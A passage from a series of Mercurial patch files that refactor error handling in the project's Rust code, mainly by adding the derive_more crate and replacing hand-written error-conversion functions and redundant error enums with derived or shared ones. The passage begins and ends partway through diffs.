+pub enum CommandError { /// The root of the repository cannot be found RootNotFound(PathBuf), /// The current directory cannot be found @@ -26,99 +26,76 @@ Unimplemented, } -impl CommandErrorKind { +impl CommandError { pub fn get_exit_code(&self) -> exitcode::ExitCode { match self { - CommandErrorKind::RootNotFound(_) => exitcode::ABORT, - CommandErrorKind::CurrentDirNotFound(_) => exitcode::ABORT, - CommandErrorKind::RequirementsError( + CommandError::RootNotFound(_) => exitcode::ABORT, + CommandError::CurrentDirNotFound(_) => exitcode::ABORT, + CommandError::RequirementsError( RequirementsError::Unsupported { .. }, ) => exitcode::UNIMPLEMENTED_COMMAND, - CommandErrorKind::RequirementsError(_) => exitcode::ABORT, - CommandErrorKind::StdoutError => exitcode::ABORT, - CommandErrorKind::StderrError => exitcode::ABORT, - CommandErrorKind::Abort(_) => exitcode::ABORT, - CommandErrorKind::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, + CommandError::RequirementsError(_) => exitcode::ABORT, + CommandError::StdoutError => exitcode::ABORT, + CommandError::StderrError => exitcode::ABORT, + CommandError::Abort(_) => exitcode::ABORT, + CommandError::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, } } - /// Return the message corresponding to the error kind if any + /// Return the message corresponding to the error if any pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { match self { - CommandErrorKind::RootNotFound(path) => { + CommandError::RootNotFound(path) => { let bytes = get_bytes_from_path(path); Some(format_bytes!( b"abort: no repository found in '{}' (.hg not found)!\n", bytes.as_slice() )) } - CommandErrorKind::CurrentDirNotFound(e) => Some(format_bytes!( + CommandError::CurrentDirNotFound(e) => Some(format_bytes!( b"abort: error getting current working directory: {}\n", e.to_string().as_bytes(), )), - CommandErrorKind::RequirementsError( - RequirementsError::Corrupted, - ) => Some( - "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), - ), - CommandErrorKind::Abort(message) => message.to_owned(), + CommandError::RequirementsError(RequirementsError::Corrupted) => { + Some( + "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), + ) + } + CommandError::Abort(message) => message.to_owned(), _ => None, } } -} -/// The error type for the Command trait -#[derive(Debug)] -pub struct CommandError { - pub kind: CommandErrorKind, -} - -impl CommandError { /// Exist the process with the corresponding exit code. pub fn exit(&self) { - std::process::exit(self.kind.get_exit_code()) - } - - /// Return the message corresponding to the command error if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - self.kind.get_error_message_bytes() - } -} - -impl From<CommandErrorKind> for CommandError { - fn from(kind: CommandErrorKind) -> Self { - CommandError { kind } + std::process::exit(self.get_exit_code()) } } impl From<UiError> for CommandError { fn from(error: UiError) -> Self { - CommandError { - kind: match error { - UiError::StdoutError(_) => CommandErrorKind::StdoutError, - UiError::StderrError(_) => CommandErrorKind::StderrError, - }, + match error { + UiError::StdoutError(_) => CommandError::StdoutError, + UiError::StderrError(_) => CommandError::StderrError, } } } impl From<FindRootError> for CommandError { fn from(err: FindRootError) -> Self { - match err.kind { - FindRootErrorKind::RootNotFound(path) => CommandError { - kind: CommandErrorKind::RootNotFound(path), - }, - FindRootErrorKind::GetCurrentDirError(e) => CommandError { - kind: CommandErrorKind::CurrentDirNotFound(e), - }, + match err { + FindRootError::RootNotFound(path) => { + CommandError::RootNotFound(path) + } + FindRootError::GetCurrentDirError(e) => { + CommandError::CurrentDirNotFound(e) + } } } } impl From<RequirementsError> for CommandError { fn from(err: RequirementsError) -> Self { - CommandError { - kind: CommandErrorKind::RequirementsError(err), - } + CommandError::RequirementsError(err) } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611687937 -3600 # Tue Jan 26 20:05:37 2021 +0100 # Node ID 2e20330812742fb88947823bcd9f1f658f30d396 # Parent 3e2d539d0d1a6390677c2d18bb8aa4fe241a8ae2 rust: replace trivial `impl From …` with `#[derive(derive_more::From)]` Crate docs: https://jeltef.github.io/derive_more/derive_more/from.html Differential Revision: https://phab.mercurial-scm.org/D9875 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -199,6 +199,16 @@ ] [[package]] +name = "derive_more" +version = "0.99.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", + "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "difference" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -293,6 +303,7 @@ "bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", + "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", @@ -696,6 +707,7 @@ version = "0.1.0" dependencies = [ "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", + "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", "hg-core 0.1.0", @@ -939,6 +951,7 @@ "checksum crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" "checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" "checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" +"checksum derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)" = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" "checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" "checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" "checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -11,6 +11,7 @@ [dependencies] bytes-cast = "0.1" byteorder = "1.3.4" +derive_more = "0.99" im-rc = "15.0.*" lazy_static = "1.4.0" memchr = "2.3.3" diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -226,7 +226,7 @@ } } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum ConfigError { Parse { origin: ConfigOrigin, @@ -239,15 +239,10 @@ io_error: std::io::Error, }, /// Any IO error that isn't expected + #[from] IO(std::io::Error), } -impl From<std::io::Error> for ConfigError { - fn from(e: std::io::Error) -> Self { - Self::IO(e) - } -} - fn make_regex(pattern: &'static str) -> Regex { Regex::new(pattern).expect("expected a valid regex") } diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -265,7 +265,7 @@ pub traversed: Vec<HgPathBuf>, } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum StatusError { /// Generic IO error IO(std::io::Error), @@ -277,22 +277,6 @@ pub type StatusResult<T> = Result<T, StatusError>; -impl From<PatternError> for StatusError { - fn from(e: PatternError) -> Self { - StatusError::Pattern(e) - } -} -impl From<HgPathError> for StatusError { - fn from(e: HgPathError) -> Self { - StatusError::Path(e) - } -} -impl From<std::io::Error> for StatusError { - fn from(e: std::io::Error) -> Self { - StatusError::IO(e) - } -} - impl ToString for StatusError { fn to_string(&self) -> String { match self { diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -89,6 +89,7 @@ DirstatePackError::CorruptedEntry(e.to_string()) } } + #[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), @@ -108,7 +109,7 @@ } } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum DirstateError { Parse(DirstateParseError), Pack(DirstatePackError), @@ -116,24 +117,14 @@ IO(std::io::Error), } -impl From<DirstateParseError> for DirstateError { - fn from(e: DirstateParseError) -> Self { - DirstateError::Parse(e) - } -} - -impl From<DirstatePackError> for DirstateError { - fn from(e: DirstatePackError) -> Self { - DirstateError::Pack(e) - } -} - -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum PatternError { + #[from] Path(HgPathError), UnsupportedSyntax(String), UnsupportedSyntaxInFile(String, String, usize), TooLong(usize), + #[from] IO(std::io::Error), /// Needed a pattern that can be turned into a regex but got one that /// can't. This should only happen through programmer error. @@ -163,27 +154,3 @@ } } } - -impl From<DirstateMapError> for DirstateError { - fn from(e: DirstateMapError) -> Self { - DirstateError::Map(e) - } -} - -impl From<std::io::Error> for DirstateError { - fn from(e: std::io::Error) -> Self { - DirstateError::IO(e) - } -} - -impl From<std::io::Error> for PatternError { - fn from(e: std::io::Error) -> Self { - PatternError::IO(e) - } -} - -impl From<HgPathError> for PatternError { - fn from(e: HgPathError) -> Self { - PatternError::Path(e) - } -} diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -16,9 +16,10 @@ } /// Error type for `debug_data` -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum DebugDataError { /// Error when reading a `revlog` file. + #[from] IoError(std::io::Error), /// The revision has not been found. InvalidRevision, @@ -32,12 +33,6 @@ UnknowRevlogDataFormat(u8), } -impl From<std::io::Error> for DebugDataError { - fn from(err: std::io::Error) -> Self { - DebugDataError::IoError(err) - } -} - impl From<RevlogError> for DebugDataError { fn from(err: RevlogError) -> Self { match err { diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -17,7 +17,7 @@ use std::convert::From; /// Error type for `Dirstate` methods -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum ListDirstateTrackedFilesError { /// Error when reading the `dirstate` file IoError(std::io::Error), @@ -25,12 +25,6 @@ ParseError(DirstateParseError), } -impl From<std::io::Error> for ListDirstateTrackedFilesError { - fn from(err: std::io::Error) -> Self { - ListDirstateTrackedFilesError::IoError(err) - } -} - /// List files under Mercurial control in the working directory /// by reading the dirstate pub struct Dirstate { diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -49,7 +49,7 @@ /// the size or return an error at runtime. /// /// [`nybbles_len`]: #method.nybbles_len -#[derive(Copy, Clone, Debug, PartialEq, BytesCast)] +#[derive(Copy, Clone, Debug, PartialEq, BytesCast, derive_more::From)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -60,12 +60,6 @@ data: [0; NODE_BYTES_LENGTH], }; -impl From<NodeData> for Node { - fn from(data: NodeData) -> Node { - Node { data } - } -} - /// Return an error if the slice has an unexpected length impl<'a> TryFrom<&'a [u8]> for &'a Node { type Error = (); diff --git a/rust/hg-core/src/utils/hg_path.rs b/rust/hg-core/src/utils/hg_path.rs --- a/rust/hg-core/src/utils/hg_path.rs +++ b/rust/hg-core/src/utils/hg_path.rs @@ -367,7 +367,9 @@ } } -#[derive(Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash)] +#[derive( + Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash, derive_more::From, +)] pub struct HgPathBuf { inner: Vec<u8>, } @@ -408,12 +410,6 @@ } } -impl From<Vec<u8>> for HgPathBuf { - fn from(vec: Vec<u8>) -> Self { - Self { inner: vec } - } -} - impl<T: ?Sized + AsRef<HgPath>> From<&T> for HgPathBuf { fn from(s: &T) -> HgPathBuf { s.as_ref().to_owned() diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -10,6 +10,7 @@ [dependencies] hg-core = { path = "../hg-core"} clap = "2.33.1" +derive_more = "0.99" log = "0.4.11" micro-timer = "0.3.1" env_logger = "0.7.1" diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -8,13 +8,14 @@ use std::path::PathBuf; /// The kind of command error -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum CommandError { /// The root of the repository cannot be found RootNotFound(PathBuf), /// The current directory cannot be found CurrentDirNotFound(std::io::Error), /// `.hg/requires` + #[from] RequirementsError(RequirementsError), /// The standard output stream cannot be written to StdoutError, @@ -93,9 +94,3 @@ } } } - -impl From<RequirementsError> for CommandError { - fn from(err: RequirementsError) -> Self { - CommandError::RequirementsError(err) - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611689486 -3600 # Tue Jan 26 20:31:26 2021 +0100 # Node ID 252d1bdba33d0cb9e491b766dfbe640de4ea864e # Parent 2e20330812742fb88947823bcd9f1f658f30d396 rhg: replace `map_*_error` functions with `From` impls Differential Revision: https://phab.mercurial-scm.org/D9876 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,8 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; -use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{cat, CatRevError}; +use hg::operations::cat; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; @@ -49,55 +48,10 @@ match self.rev { Some(rev) => { - let data = cat(&repo, rev, &files) - .map_err(|e| map_rev_error(rev, e))?; + let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; self.display(ui, &data) } None => Err(CommandError::Unimplemented.into()), } } } - -/// Convert `CatRevError` to `CommandError` -fn map_rev_error(rev: &str, err: CatRevError) -> CommandError { - match err { - CatRevError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - CatRevError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - CatRevError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } -} diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,8 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; -use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{debug_data, DebugDataError, DebugDataKind}; +use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; @@ -26,7 +25,7 @@ fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; let data = debug_data(&repo, self.rev, self.kind) - .map_err(|e| to_command_error(self.rev, e))?; + .map_err(|e| (e, self.rev))?; let mut stdout = ui.stdout_buffer(); stdout.write_all(&data)?; @@ -35,47 +34,3 @@ Ok(()) } } - -/// Convert operation errors to command errors -fn to_command_error(rev: &str, err: DebugDataError) -> CommandError { - match err { - DebugDataError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - DebugDataError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", - rev - )) - .into(), - )), - DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", - rev - )) - .into(), - )), - DebugDataError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - DebugDataError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - DebugDataError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } -} diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,9 +1,8 @@ use crate::commands::Command; use crate::error::CommandError; -use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{list_rev_tracked_files, ListRevTrackedFilesError}; -use hg::operations::{Dirstate, ListDirstateTrackedFilesError}; +use hg::operations::list_rev_tracked_files; +use hg::operations::Dirstate; use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -52,76 +51,13 @@ let repo = Repo::find()?; repo.check_requirements()?; if let Some(rev) = self.rev { - let files = list_rev_tracked_files(&repo, rev) - .map_err(|e| map_rev_error(rev, e))?; + let files = + list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; self.display_files(ui, &repo, files.iter()) } else { - let distate = Dirstate::new(&repo).map_err(map_dirstate_error)?; - let files = distate.tracked_files().map_err(map_dirstate_error)?; + let distate = Dirstate::new(&repo)?; + let files = distate.tracked_files()?; self.display_files(ui, &repo, files) } } } - -/// Convert `ListRevTrackedFilesError` to `CommandError` -fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError { - match err { - ListRevTrackedFilesError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - ListRevTrackedFilesError::InvalidRevision => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::AmbiguousPrefix => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - ListRevTrackedFilesError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } -} - -/// Convert `ListDirstateTrackedFilesError` to `CommandError` -fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError { - match err { - ListDirstateTrackedFilesError::IoError(err) => CommandError::Abort( - Some(utf8_to_local(&format!("abort: {}\n", err)).into()), - ), - ListDirstateTrackedFilesError::ParseError(_) => { - CommandError::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - } -} diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,7 +1,11 @@ use crate::exitcode; +use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::FindRootError; +use hg::operations::{ + CatRevError, DebugDataError, FindRootError, ListDirstateTrackedFilesError, + ListRevTrackedFilesError, +}; use hg::requirements::RequirementsError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -94,3 +98,160 @@ } } } + +impl From<(DebugDataError, &str)> for CommandError { + fn from((err, rev): (DebugDataError, &str)) -> CommandError { + match err { + DebugDataError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + DebugDataError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version + )) + .into(), + )) + } + DebugDataError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + DebugDataError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format + )) + .into(), + )) + } + } + } +} + +impl From<(ListRevTrackedFilesError, &str)> for CommandError { + fn from((err, rev): (ListRevTrackedFilesError, &str)) -> CommandError { + match err { + ListRevTrackedFilesError::IoError(err) => CommandError::Abort( + Some(utf8_to_local(&format!("abort: {}\n", err)).into()), + ), + ListRevTrackedFilesError::InvalidRevision => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev + )) + .into(), + )) + } + ListRevTrackedFilesError::AmbiguousPrefix => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev + )) + .into(), + )) + } + ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version + )) + .into(), + )) + } + ListRevTrackedFilesError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format + )) + .into(), + )) + } + } + } +} + +impl From<(CatRevError, &str)> for CommandError { + fn from((err, rev): (CatRevError, &str)) -> CommandError { + match err { + CatRevError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + CatRevError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version + )) + .into(), + )) + } + CatRevError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + CatRevError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format + )) + .into(), + )) + } + } + } +} + +impl From<ListDirstateTrackedFilesError> for CommandError { + fn from(err: ListDirstateTrackedFilesError) -> Self { + match err { + ListDirstateTrackedFilesError::IoError(err) => { + CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )) + } + ListDirstateTrackedFilesError::ParseError(_) => { + CommandError::Abort(Some( + // TODO find a better error message + b"abort: parse error\n".to_vec(), + )) + } + } + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611690156 -3600 # Tue Jan 26 20:42:36 2021 +0100 # Node ID b274aa2f20fd61b272a004d367a3ae10ece72716 # Parent 252d1bdba33d0cb9e491b766dfbe640de4ea864e rust: remove three enums that were identical to `RevlogError` Differential Revision: https://phab.mercurial-scm.org/D9877 diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -5,7 +5,6 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use std::convert::From; use std::path::PathBuf; use crate::repo::Repo; @@ -20,40 +19,6 @@ const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// Error type for `cat` -#[derive(Debug)] -pub enum CatRevError { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -impl From<RevlogError> for CatRevError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => CatRevError::IoError(err), - RevlogError::UnsuportedVersion(version) => { - CatRevError::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => CatRevError::InvalidRevision, - RevlogError::AmbiguousPrefix => CatRevError::AmbiguousPrefix, - RevlogError::Corrupted => CatRevError::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - CatRevError::UnknowRevlogDataFormat(format) - } - } - } -} - /// List files under Mercurial control at a given revision. /// /// * `root`: Repository root @@ -63,13 +28,13 @@ repo: &Repo, revset: &str, files: &[HgPathBuf], -) -> Result<Vec<u8>, CatRevError> { +) -> Result<Vec<u8>, RevlogError> { let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| CatRevError::CorruptedRevlog)?; + .map_err(|_| RevlogError::Corrupted)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; @@ -82,7 +47,7 @@ let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; let file_node = Node::from_hex(node_bytes) - .map_err(|_| CatRevError::CorruptedRevlog)?; + .map_err(|_| RevlogError::Corrupted)?; let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -15,47 +15,12 @@ Manifest, } -/// Error type for `debug_data` -#[derive(Debug, derive_more::From)] -pub enum DebugDataError { - /// Error when reading a `revlog` file. - #[from] - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -impl From<RevlogError> for DebugDataError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => DebugDataError::IoError(err), - RevlogError::UnsuportedVersion(version) => { - DebugDataError::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => DebugDataError::InvalidRevision, - RevlogError::AmbiguousPrefix => DebugDataError::AmbiguousPrefix, - RevlogError::Corrupted => DebugDataError::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - DebugDataError::UnknowRevlogDataFormat(format) - } - } - } -} - /// Dump the contents data of a revision. pub fn debug_data( repo: &Repo, revset: &str, kind: DebugDataKind, -) -> Result<Vec<u8>, DebugDataError> { +) -> Result<Vec<u8>, RevlogError> { let index_file = match kind { DebugDataKind::Changelog => "00changelog.i", DebugDataKind::Manifest => "00manifest.i", diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -14,7 +14,6 @@ use crate::utils::hg_path::HgPath; use crate::{DirstateParseError, EntryState}; use rayon::prelude::*; -use std::convert::From; /// Error type for `Dirstate` methods #[derive(Debug, derive_more::From)] @@ -55,59 +54,17 @@ } } -/// Error type `list_rev_tracked_files` -#[derive(Debug)] -pub enum ListRevTrackedFilesError { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -impl From<RevlogError> for ListRevTrackedFilesError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => { - ListRevTrackedFilesError::IoError(err) - } - RevlogError::UnsuportedVersion(version) => { - ListRevTrackedFilesError::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - ListRevTrackedFilesError::InvalidRevision - } - RevlogError::AmbiguousPrefix => { - 